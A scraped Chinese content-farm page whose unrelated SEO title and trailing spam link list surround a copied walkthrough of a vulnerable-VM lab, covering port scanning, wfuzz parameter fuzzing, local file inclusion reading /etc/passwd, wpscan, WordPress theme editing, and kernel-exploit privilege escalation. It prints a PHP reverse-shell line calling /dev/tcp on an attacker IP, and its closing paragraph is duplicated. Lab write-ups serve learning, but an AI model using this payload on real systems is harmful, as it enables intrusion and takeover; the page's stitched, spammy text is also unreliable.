当前位置: 首页 > news >正文

怎么根据网站做二维码登陆江西建设厅三类人员的网站

怎么根据网站做二维码,登陆江西建设厅三类人员的网站,专业提升关键词排名工具,网页制作软件大概需要多少钱主机发现 nmap扫描与分析 端口22、80 详细扫描#xff1b;linux、ubuntu、 udp扫描 端口都是关闭的 脚本扫描 web渗透 打开只有一张图片#xff1b;源码有图片和一个alt#xff1a;hnp security不知道有啥用#xff0c;先记录下来吧 继续web渗透思路走吧#xff0c;目录… 主机发现 nmap扫描与分析 端口22、80 详细扫描linux、ubuntu、 udp扫描 端口都是关闭的 脚本扫描 web渗透 打开只有一张图片源码有图片和一个althnp security不知道有啥用先记录下来吧 继续web渗透思路走吧目录爆破 关于工具有很多差别不大主要是会工具的指定参数 man dirb看一下工具使用参数 dirb也会对二级目录进行扫描 dev不算一个常规目录index.php、wordpress 说我们正在0级别在真实渗透测试中我们应该用我们的工具深度挖掘web祝我们快了意义不大 那是不是dirb一级目录扫描意义我们进入深度扫描-X指定参数一般有.zip、.txtphp感觉暂时不用添加吧因为他这个是worepress网站 secret.txt curl看一下吧 fuzz模糊测试意思每一个php页面得到正确参数如果仍然被卡住OSCP https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web github网站貌似就是一个模糊测试 给的有 COMMNAD wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZsomething COMMAND wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZsomething COMMAND wfuzz -c -w /usr/share/seclists//usr/share/seclists/Discovery/DNS --hc 404 --hw 617 -u website.com -H HOST: FUZZ.website.com COMMAND wfuzz -c -w /usr/share/seclists//usr/share/seclists/Discovery/DNS --hc 404 --hw 7873 -u hnpsec.com -H HOST: FUZZ.hnpsec.com 那我们再指定.php扫 http://192.168.218.159/image.phphttp://192.168.218.159/index.php 两个php网站打开都是开头的图片按照提示意思应该是wfuzz对php进行模糊测试 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.218.159/image.php?FUZZsomething-c 高亮显示颜色-w指定字典something无所谓用啥都行 晒选隐藏的404在正常思路中wfuzz都先不加指定404的我们先去掉测试一下 多次出现的147 12w应该都是没有意义的 我们可以把它隐藏掉 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147 http://192.168.218.159/image.php?FUZZsomething没东西那换另一个文件去扫描 嗯这有file文件 去看一下说做得不错正在挖掘错误的文件 打个靶机还被入坑嘲讽了那思路就是错了 再看一下目前有的信息再利用吧 直接网站访问location是不行的file会不会文件包含漏洞啥的往后指定下location.txt 错误连接我又扫了一下80关闭了是靶机自带的坑还是我的靶机不太稳定又重启了一遍 提示说secrettier360参数在其他php页面 问题是secrettier360后跟啥东西尝试无后缀location.txt等等还是不行换个php文件 文件包含漏洞 这个就可以了、说得到了正确参数暂时迷住了没啥思路 找到了正确的位置也没啥其他提示了这个文件利用也挺多的尝试文件包含漏洞嗯一把成 收集下bash环境的用户 victor、root 又没啥东西了观察了半天/etc/passwd下还有提示 find password.txt file in my directory:/home/saket: 在我的目录中找到password.txt文件/home/saket 再用漏洞访问一下嗯可以说又是正确参数follow_the_ippsec 尝试作为ssh密码尝试后都错误了忘记wordpress了 针对cms的扫描大部分用的是wpscan wpscan --url 192.168.218.159/wordpress -e u-u是刚才有了follow_the_ippsec我们现在看他有哪些用户很熟悉 获得wordpress后台权限 登录victor成功 因为wordpress做的很多通常都是插件或者主题里进行文件上传 获取初始系统shell 他说我们需要使这个文件可写那我们就去寻找嘛 找到这我们思路就是写php反弹shell ?php exec(/bin/bash -c bash -i /dev/tcp/192.168.218.145/445 01);?之后就是执行这个页面找一下这个路径 /wordpress/wp-content/themes/twentynineteen/secret.php 同时看kali也反应了 照常sudo -l 看一下各类信息啥的 可以看passwd不能看shadow简单尝试的已经尝试了 系统内核漏洞提权 uname -a Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linuxsearchsploit搜一下内核能不能利用 第一个不是提权简单试一下第二个先把文件下载到本地 我们要养成一个逻辑拿到一个文件我们要简单读一读知道是啥样的 编译这点要说一下如果kali版本过高gcc编译是不一样的可能无法利用尽量在靶机里编译 建立php服务器传输利用文件一般在tmp进行传输利用 或者python都可以这里我用的python python -m http.server 888 将已经编译好的和未编译的都传过来 加上x执行权限执行意料之中不行我的本地kali版本太高了 使用靶机的gcc尝试一下这样应该是成了 使用python交互式解决下交互式的问题 python -c import pty;pty.spawn(/bin/bash)这个靶机目前就已经拉满了 加上x执行权限执行意料之中不行我的本地kali版本太高了 使用靶机的gcc尝试一下这样应该是成了 使用python交互式解决下交互式的问题 python -c import pty;pty.spawn(/bin/bash)这个靶机目前就已经拉满了
http://www.dnsts.com.cn/news/171369.html

相关文章:

  • 一个空间2个网站代码成都诗和远方网站建设
  • 广州专业的网站建设公司排名企业网站建设排名
  • 长武网站建设网站里的动画效果图
  • 徐州人才网官方网站奢侈品网站 方案
  • 建立网站站点福建漳州网站建设公司
  • 要想做一个好网站需要多久怎么在微信做企业网站
  • 友汇网网站建设管理后台网站百度查关键词显示排名
  • 衡水提供网站制作公司哪家专业戚墅堰网站建设
  • 必应网站收录在哪制作一个app软件需要多少时间
  • 建立公司网站要多少钱电商网站设计欣赏
  • 安徽建设厅网站打不开汽车门店管理系统
  • 网站前期策划视频网站开发策划书
  • 网站模板源码免费下载中国黄页电话簿
  • 学校网站logo怎么做企业数字化平台
  • 网站备案号链接2014网站设计
  • 网站推广方案中确定目标是指排版设计网站有哪些
  • 网站开发有什么注意的网页制作工具通常在哪里建立热点
  • 包装设计接单网站怎么做好手机网站开发
  • 更改wordpress程序站点网址塔式服务器主机建网站
  • 禹城市住房和城乡建设局网站网站建设中山优化
  • 如何对网站页面进行优化个人建购物网站怎么备案
  • 商城系统网站建设开发wordpress优化seo
  • 宁波建设协会网站首页建设网站可选择的方案
  • 怎么做网站接家纺订单wordpress分类404
  • 整站优化关键词推广google免费vps
  • 山东网站建设公司哪家专业网站建设系统 网站自助建站系统
  • wordpress 分类目录 丢失快速提高网站关键词排名优化
  • 网站推广智选刺盾云下拉深圳建设信息网站
  • 三明网站建设tudouly做站长建不好网站
  • 广东省自然资源厅厅长陈光荣简历seo公司官网